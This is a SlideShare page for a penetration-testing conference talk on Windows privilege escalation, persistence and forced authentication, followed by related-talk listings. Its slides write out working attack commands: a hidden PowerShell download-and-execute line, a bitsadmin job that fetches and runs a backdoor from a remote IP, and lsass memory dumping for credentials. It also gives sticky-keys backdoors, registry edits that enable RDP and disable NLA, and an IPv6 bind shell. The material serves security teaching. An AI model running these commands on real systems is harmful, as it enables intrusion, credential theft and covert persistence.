SlideShare uma empresa Scribd logo

Windows attacks - AT is the new black

Chris Gates
Chris Gates

A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.

Tecnologia
1 de 76
Attacks AT is the new BLACK
About Me mubix NoVA Hackers Co-founder Marine Corps Hak5 Metasploit Dad Husband
About Me cg carnal0wnage NoVA Hackers Co-founder Lares carnal0wnage.attackresearch.com
What we're gonna talk about ● Tricks/Misconfigurations as a user ● Escalation from admin-->system ● Persistence ● Forced Authentication ● Misc
Encyclopedia of Windows Privilege Escalation By Brett More Ruxcon 2012 http://www.docstoc.com/docs/112350262/Windows-Priv-Esc http://www.youtube.com/watch?v=kMG8IsCohHA This is an addition, lots of good info there that won’t necessarily be covered here.
Exploits
Old Skewl Local Exploits Taviso bug sysret etc More and more are baked into frameworks and run via their agent - MSF, Canvas, Core Impact *normally* not an issue but occasionally not having a .exe to run is a bummer
Keyloggers You have to be SYSTEM to get into winlogon for the user. BUT, every time i’ve keylogged (lately) they’ve typed their domain creds into something i could capture as a user.
Pocket Litter
Look For Creds On The Box You might find creds on the box. Examples dir /s *pass* dir /s *cred* dir /s *vnc* dir /s *.config type C:sysprep.inf [clear] type C:sysprepsysprep.xml [base64] Is their truecrypt/PGP drive mapped?
Look For Creds On The Box You might find creds on the box. Examples post/windows/gather/credentials/*
GPP Group Policy Preference XML files include an encrypted set of credentials (if credentials are used), these are used for new users, making shares, etc etc. The encryption is documented. Free passwords! Source: http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html Original Source (down) : http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences Key: http://msdn.microsoft.com/en-us/library/cc422924.aspx
Unattended Installs - Client Unattended.xml is a file that is left on a system after an unattended install, many times setting the local administrator password Usually found in: %WINDIR%PantherUnattend %WINDIR%Panther http://rewtdance.blogspot.com/2012/11/windows-deployment-services-clear-text.html
Unattended Installs - Server No authentication is needed to gather Unattended.xml Just need to find the "Windows Deployment Services" server auxiliary/scanner/dcerpc/windows_deployment _services
Unattended Installs - Server Windows Deployment Services aren’t the only methods to do Unattended installs. But the Unattend.xml is a standard. Find it == Win
Unattended Installs - Server http://technet.microsoft.com/en- us/library/cc766271(v=ws.10).aspx <LocalAccounts> <LocalAccount wcm:action="add"> <Password> <Value>cAB3AFAAYQBzAHMAdwBvAHIAZAA</Value> <PlainText>false</PlainText> </Password> <Description>Test account</Description> <DisplayName>Admin/Power User Account</DisplayName> <Group>Administrators;Power Users</Group> <Name>Test1</Name> </LocalAccount> cAB3AFAAYQBzAHMAdwBvAHIAZAA == pwPassword (‘pw‘ is the password) Base64 encoded != PlainText ;-)
Configuration Failures
User Permissions Domain User == Local Administrator on the host Domain User == Power User on the host http://blogs.technet.com/b/markrussinovich/archive/2006/05/01/the-power-in-power-users.aspx All Domain Users == Local Admins on all hosts Many Domain Groups = Local Admins on all hosts
Binpath Service Modify accesschk.exe -uwcq * | findstr /v AUTHORITY | findstr /v Administrators (remember not all languages spell “Administrators” the same) Binpath mod: sc config badsrvc binpath= "net user bob /add" type= interact sc start badsrvc sc stop badsrvc
Binpath Service Modify - Example
AlwaysInstallElevated Setting used to allow standard users to install MSI files without having to be admins. HKLMSOFTWAREPoliciesMicrosoftWindows InstallerAlwaysInstallElevated HKCUSOFTWAREPoliciesMicrosoftWindow sInstallerAlwaysInstallElevated
Missing Autoruns C:sysinternals>autorunsc.exe -a | findstr /n /R "File not found" 131: File not found: C:Program Files (x86)BlueStacksHD-Service.exe BstHdAndroidSvc Android 338: c:windowsmicrosoft.netframework64v3.0windows communication foundationinfocard.exe 1248: File not found: C:Program Files (x86)BlueStacksHD-Hypervisor- amd64.sys 2262: File not found: System32driverssynth3dvsc.sys 2326: File not found: system32driverstsusbhub.sys 2479: File not found: System32driversrdvgkmd.sys
Service Quoting - CVE-2000-1128 wmic service get name,displayname,pathname, startmode |findstr /i "auto" |findstr /i /v "c: windows" |findstr /i /v """ (XP requires admin access to use, Vista+ users can run) Non admin on XP, 1 by 1: sc qc "NVIDIA Update Service Daemon"
Service Quoting (Manual) sc query Get list of services sc qc skypeupdate [SC] QueryServiceConfig SUCCESS SERVICE_NAME: skypeupdate TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:Program Files (x86)SkypeUpdaterUpdater.exe" <--Not Vulnerable LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Skype Updater DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem
Service Quoting (Manual) sc query Get list of services sc qc LENOVO.TPKNRSVC [SC] QueryServiceConfig SUCCESS SERVICE_NAME: LENOVO.TPKNRSVC TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:Program FilesLenovoCommunications UtilityTPKNRSVC.exe <--Vulnerable LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Lenovo Keyboard Noise Reduction DEPENDENCIES : SERVICE_START_NAME : LocalSystem
Service Quoting Example: NVIDIA Update Service Daemon C:Program Files (x86)NVIDIA CorporationNVIDIA Update Coredaemonu.exe C:Program.exe C:Program Files (x86)NVIDIA.exe C:Program Files (x86)NVIDIA CorporationNVIDIA.exe Lenovo Keyboard Noise Reduction C:Program FilesLenovoCommunications UtilityTPKNRSVC.exe C:Program.exe C:Program FilesLenovoCommunications.exe
DLL Loading or Bad permissions fxsst.dll - looks in C:Windows first, the where it really is C:WindowsSystem32 Source: https://github.com/rapid7/metasploit-framework/pull/1103
Pentest Monkey Script to Check pentest monkey’s priv check tool Source: http://pentestmonkey.net/tools/windows-privesc-check
Admin -> SYSTEM
MSF getsystem getsystem -t 1 :-) requires meterpreter work anywhere else? can do manually?
Sysinternals psexec psexec -i -s -d cmd.exe psexec: http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
Binary Replacement Replace binary called by a service with YOUR binary 1. stop service 2. replace binary 3. start service **Usually works for Power Users too** Source: http://www.madhur.co.in/blog/2011/09/23/privilegeescalation.html
WMIC wmic /node:DC1 /user: DOMAINdomainadminsvc /password: domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > C: tempoutput.txt" Source: http://www.room362.com/blog/2013/6/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part1. html
AT at 13:20 /interactive cmd net use targetserver /user:DOMuser pass net time targetserver at targetserver 13:20 C:tempevil.bat Executes as SYSTEM Must be an admin to do it Easy way to check "whoami /groups" on Vista+
Debugging CMD.exe Start the debugging: at 13:37 C:debuggersremote.exe /s cmd SYSCMD Connect to the debugger: C:debuggersremote.exe /c 127.0.0.1 SYSCMD NTSD can be used for this as well Source: http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html NTSD: http://www.securityaegis.com/ntsd-backdoor/
schtasks Wonderful new features! 1. Any user can create a task 2. I have new options other than "ONCE", like ONIDLE, ONLOGON, and ONSTART Scenario 1: ONIDLE run my C2 check-in binary Scenario 2: ONLOGON run my cred dumper bin Scenario 3: ONSTART copy evil bin to random location and start it.
Bypass UAC w/ Creds UAC will not let local accounts authenticate locally to elevate past UAC Domain accounts have no such restriction. Utilize Metasploit's PSEXEC + Domain account that is an admin on the box you are on = No UAC no more. Source: http://mubix.github.io/blog/2013/08/11/psexec-uac-bypass-with-credentials/
Persistence
Passwords - best persistence method WCE and Mimikatz wdigest (your AD password) kerberos (your LM / NTLM hash) ssp (your Outlook password) livessp (your windows8 password) msv (your AD password) tspkg (your AD password) WCE: http://www.ampliasecurity.com/research/wcefaq.html Mimikatz: http://blog.gentilkiwi.com/mimikatz
Passwords through process dumping net use targetserver /user:DOMuser pass copy procdump.exe targetserverc$ copy procdump.bat targetserverc$ procdump.exe -ma lsass %CNAME%.dmp at targetserver 13:37 C:procdump.bat copy targetserverc$targetserver.dmp . game over... Source: http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a. html
Ol’ Reliable Put binary or .bat script in a startup folder yeah shouldnt work, but it does… Registry run keys
SETHC / UTILMAN Replace %WINDIR%System32sethc.exe Replace %WINDIR%System32utilman.exe Hit SHIFT 5 times = sethc.exe run by SYSTEM Win Key + U = utilman.exe run by SYSTEM Files locked by Windows, must be done "offline" If NLA (Network Layer Authentication) is enabled, won't work If RDP is disabled, won't work Source: http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html
SETHC / UTILMAN - NO REBOOT HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options make a key called "sethc.exe" make a REG_SZ value called "Debugger" (capitalized) give it "calc.exe" as the value Hit SHIFT 5 times. Source: http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html
SETHC / UTILMAN - CONNECTIVITY Enable RDP: reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTermin al Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Disable NLA: reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTermin al ServerWinStationsRDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f Firewall exception for RDP: netsh firewall set service type = remotedesktop mode = enable Source: http://www.room362.com/blog/2012/5/25/sticky-keys-and-utilman-against-nla.html
Teredo IPv6 + Bindshell netsh interface ipv6 install netsh interface ipv6 teredo enterpriseclient netsh interface ipv6 teredo set client teredo. managemydedi.com msfpayload windows/meterpreter/bind_ipv6_tcp Create a loop that runs the payload, then pings your IPv6 address, wait for user to take their laptop home. Source: http://www.room362.com/blog/2010/9/24/revenge-of-the-bind-shell.html
Rename on next reboot HKLMSystemCurrentControlSetControlSessi on ManagerPendingFileRenameOperations Image from: http://education.aspu.ru/view.php?wnt=280
Exporting Wireless Configs netsh wlan export profile key=clear <sharedKey> <keyType>passPhrase</keyType> <protected>false</protected> <keyMaterial>myPasswrd</keyMaterial> </sharedKey> Source: http://www.digininja.org/metasploit/getwlanprofiles.php
Powershell Downloader Schedule this and it will execute the shellcode on that page, pulling it each time (so you can change as needed) powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient). downloadstring('http://192.168.172.1: 8080/myHbBywMxOSB'))" Source: http://securitypadawan.blogspot.com/2013/07/authenticated-metasploit-payloads-via.html
BITSADMIN Downloader/Exec bitsadmin /create mybackdoor BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. Created job {6C79ABFA-F7AA-4411-B74D- B790666E130F}. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
BITSADMIN Downloader/Exec bitsadmin /addfile mybackdoor http://192. 168.222.150/myshell.exe C: windowstempmyshell.exe BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. Added http://192.168.222.150/myshell.exe -> C:windowstempmyshell.exe to job. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
BITSADMIN Downloader/Exec bitsadmin /SETMINRETRYDELAY mybackdoor 86400 BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. Minimum retry delay set to 86400. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
BITSADMIN Downloader/Exec bitsadmin /SETNOTIFYCMDLINE mybackdoor C: windowstempmyshell.exe NULL BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. notification command line set to 'C: windowstempmyshell.exe' 'NULL'. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
BITSADMIN Downloader/Exec bitsadmin /getnotifycmdline mybackdoor the notification command line is 'C: windowstempmyshell.exe' 'NULL' bitsadmin /listfiles mybackdoor 0 / UNKNOWN WORKING http://192.168.222.150 /myshell.exe -> C:windowstempmyshell.exe bitsadmin /RESUME mybackdoor Job resumed. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
Password Filters (requires reboot) Dump DLL in %WINDIR%System32 Update: HKLMSYSTEMCurrentControlSetControlLsa Notification Packages Sit and wait for clear text passwords as defined functionality by Microsoft: http://msdn.microsoft.com/en- us/library/windows/desktop/ms721882(v=vs.
Password Filters hooking, no reboot Reflective DLL injection w/ Powershell (in- memory) hooking.
SSPI (requires reboot) Kiwissp.dll 1. compile 2. drop in system32 3. “Security Packages” registry key 4. wait for passwords
Command Line PPTP Tunnel post/windows/manage/pptp_tunnel Create a PPTP tunnel between victim and attacker. Microsoft intentionally created PPTP to be resilient to network drops and changes. Source: http://www.shelliscoming.com/2013/06/metasploit-man-in-middle-through-pptp.html
Just uninstall a patch Not recommended for clients, but if you need back on a system, make it vulnerable.
Forced Authentication
lmhosts 192.168.92.123 evil #PRE #BEGIN_ALTERNATE #INCLUDE evilshare1test.txt #END_ALTERNATE
LNK (Shortcuts) with UNC icons Create a shortcut to anything (cmd.exe) Go to Properties -> Change Icon and give it a UNC path. Source http://www.room362.com/blog/2012/2/11/ms08_068-ms10_046-fun-until-2018.html
Auth and Persistence Anyone see what I did? Source: http://carnal0wnage.attackresearch.com/2013/09/finding-executable-hijacking.html Used in conjunction with this REG key can be devastating: HKLMSYSTEM CurrentControlSetControl Session Manager CWDIllegalInDllSearch = 0
Misc
WinRM Windows Remote Management - includes WinRS (Windows Remote Shell) Listens on 5985/5986 by default, allows interactive shell access over HTTP. Old versions and those installed with IIS are on 80 Found by asking servers for /wsman and recording 402s
Injecting CAs post/windows/manage/inject_ca & remove_ca Throws a CA on a system, code signing, web, etc. Can be used to bypass application whitelisting (if "signed-good" binaries are allowed) Also can allow you to proxy all SSL traffic for a user, without any warnings to them. vt ( Nick Freeman @ Security-Assessment.com )
WPAD, WPADWPADWPAD & LLMNR Auto detects proxy Looks for WPAD IPv6 version (LLMNR) Looks for WPADWPADWPAD You get to set their proxy information ;-)
PORTPROXY Basically port forwarding built into Windows Firewall. Modes: v4tov4 v4tov6 v6tov4 v6tov6 Oh yea… Plus if you’re lazy (there is a module for that): post/windows/manage/portproxy
Abusing PORTPROXY LNK UNC attack to a share that doesn't exist Windows will auto-try WebDAV PORTPROXY on 80 out over IPv6/teredo Since Windows is connecting "internally" the hosts will auto-authenticate .. Invisible
Stealing SSL Cookies logman start LogCookies -p Microsoft-Windows-WinInet -o logcookies.etl -ets wevtutil qe logcookies.etl /lf:true /f:Text | find /i "cookie added" wevtutil qe logcookies.etl /lf:true /f:Text | find /i "POST" logman stop LogCookies -ets Mark Baggett Source: http://pauldotcom.com/2012/07/post-exploitation-recon-with-e.html
Breaking NetNTLMv1 http://markgamache.blogspot. com/2013/01/ntlm-challenge-response-is-100- broken.html PoC turns NetNTLMv1 into this format: $99$ASNFZ4mrze8lqYwcMegYR0ZrKbLfRoDz2Ag= Cloudcrack.com will turn that into straight NTLM in 23 hours.
DEP Exclusions DEP OptOut can be annoying and stop binaries from running. Adding your binary to: HKLMSoftwareMicrosoftWindows NTCurrentVersionAppCompatFlagLayers with the value "DisableNXShowUI". Doesn’t work This does: rundll32 sysdm.cpl, NoExecuteAddFileOptOutList "C: tempevil.exe" Source: http://hackingnotes.com/post/add-executable-to-dep-exclusion-from-the-command-line
Zone Transfer via AD Domain Admin can run this (powershell): PS C:Usersjdoe> get-wmiobject - ComputerName dc1 -Namespace rootmicrosoftDNS - Class MicrosoftDNS_ResourceRecord -Filter "domainname='projectmentor.net'" | select textrepresentation Source: http://marcusoh.blogspot.com/2012/06/enumerating-dns-records-with-powershell.html
Zone Transfer via AD
Zone Transfer via AD Users can run this (powershell): ● PS C:Usersjdoe> dns-dump.ps1 -zone projectmentor. net -dc dc1 ● C:> powershell -ep bypass -f dnsdump.ps1 -zone projectmentor.net -dc dc1 Code: https://github. com/mmessano/PowerShell/blob/master/dns- dump.ps1 Source: http://www.indented.co.uk/index.php/2009/06/18/mapping-the-dnsrecord-attribute/
END @mubix @carnal0wnage Mubix “Rob” Fuller mubix@hak5.org Chris Gates chris@carnal0wnage.com
Abstract A follow on to the Encyclopaedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.

Recomendados

Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 

Recomendados

Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheetMichael Gough
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory PwnagePetros Koutroumpis
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationJustin Bui
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wireInfoSec Addicts
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0Will Schroeder
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory ForensicsIIJ
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfTeymur Kheirkhabarov
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 eventsMichael Gough
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Windows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeology
Windows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeologyWindows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeology
Windows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeologyMichael Gough
 
PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaMauricio Velazco
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolIntroducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolMichael Gough
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 

Mais conteúdo relacionado

Mais procurados

Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheetMichael Gough
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory PwnagePetros Koutroumpis
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationJustin Bui
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wireInfoSec Addicts
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory ForensicsIIJ
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 eventsMichael Gough
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Windows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeology
Windows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeologyWindows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeology
Windows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeologyMichael Gough
 
PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaMauricio Velazco
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolIntroducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolMichael Gough
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 

Mais procurados (20)

Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheet
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
 
Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token Manipulation
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wire
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory Forensics
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 events
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Windows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeology
Windows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeologyWindows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeology
Windows Logging Cheat Sheet ver Jan 2016 - MalwareArchaeology
 
PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows toolIntroducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 

Destaque

SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsScott Sutherland
 
Common technique in Bypassing Stuff in Python.
